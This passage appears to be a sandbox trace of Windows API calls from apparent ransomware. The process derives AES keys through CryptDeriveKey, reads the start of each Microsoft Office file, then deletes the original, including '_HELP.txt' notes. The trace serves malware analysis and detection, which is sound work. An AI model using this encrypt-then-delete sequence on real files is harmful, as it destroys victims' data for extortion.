ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.878] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.878] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.878] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.879] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml")) returned 1 [0159.880] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.882] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.882] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.882] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.882] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeff [0159.882] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.884] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.884] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.884] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.885] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml")) returned 1 [0159.886] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.886] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.886] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.886] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.886] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe20 [0159.886] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.903] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.903] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.903] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.904] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml")) returned 1 [0159.906] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.906] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.906] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.906] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.906] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe19 [0159.906] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.908] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.908] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.908] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.910] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml")) returned 1 [0159.911] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.911] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.911] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.911] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.911] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe14 [0159.911] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.932] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.932] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.932] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.933] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml")) returned 1 [0159.934] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.934] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.934] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.934] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.934] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdf9 [0159.934] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.936] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.937] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.937] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.938] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml")) returned 1 [0159.939] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.939] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.939] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0159.939] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.940] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.940] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.940] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\_help.txt")) returned 1 [0159.943] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0159.943] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0159.944] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.944] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0159.944] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a23c [0159.944] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0159.964] CryptDestroyHash (hHash=0x284d628) returned 1 [0159.964] CryptDestroyKey (hKey=0x284d568) returned 1 [0159.964] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.965] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\trek.thmx")) returned 1 [0159.968] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0159.968] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0159.968] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.968] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0159.968] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfc70 [0159.968] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0159.999] CryptDestroyHash (hHash=0x284d528) returned 1 [0159.999] CryptDestroyKey (hKey=0x284d568) returned 1 [0159.999] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0160.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\urban.thmx")) returned 1 [0160.003] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0160.003] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0160.003] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.003] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0160.003] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12600 [0160.003] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0160.021] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.021] CryptDestroyKey (hKey=0x284d568) returned 1 [0160.021] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0160.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\verve.thmx")) returned 1 [0160.025] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0160.025] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0160.025] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.025] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0160.025] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c681 [0160.026] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0160.051] CryptDestroyHash (hHash=0x284d528) returned 1 [0160.051] CryptDestroyKey (hKey=0x284d568) returned 1 [0160.051] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0160.053] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Waveform.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\waveform.thmx")) returned 1 [0160.054] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0160.055] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0160.055] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.055] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0160.055] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0160.055] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0160.056] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.056] CryptDestroyKey (hKey=0x284d568) returned 1 [0160.056] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0160.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\_help.txt")) returned 1 [0160.059] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.117] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.118] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.120] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.120] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.134] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.145] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.151] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.152] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.163] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.165] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.176] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.176] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.177] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.177] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.177] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.177] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe [0160.177] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.178] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.178] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.178] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+Connect to New Data Source.odc" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\+connect to new data source.odc")) returned 1 [0160.180] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.181] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.181] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.181] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.181] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc4 [0160.181] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.182] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0160.182] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.182] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+NewSQLServerConnection.odc" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\+newsqlserverconnection.odc")) returned 1 [0160.191] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.192] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.192] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.193] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.193] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.193] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161d [0160.193] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.213] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.213] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.213] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_casual.gif")) returned 1 [0160.215] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.215] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.215] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.215] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.215] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7dd3 [0160.215] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.229] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0160.229] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.229] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.230] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_country.gif")) returned 1 [0160.232] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.233] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.233] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.233] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.233] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132a [0160.233] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.236] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.236] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.236] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_earthy.gif")) returned 1 [0160.240] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.240] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.240] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.240] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.240] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5690 [0160.240] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.257] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0160.257] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.257] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_greentea.gif")) returned 1 [0160.260] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.260] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.260] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.260] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.260] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a [0160.260] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x6a, lpOverlapped=0x0) returned 1 [0160.262] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.262] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.262] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.263] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_groove.gif")) returned 1 [0160.265] CryptAcquireContextW (in: phProv=0x326a4cc, 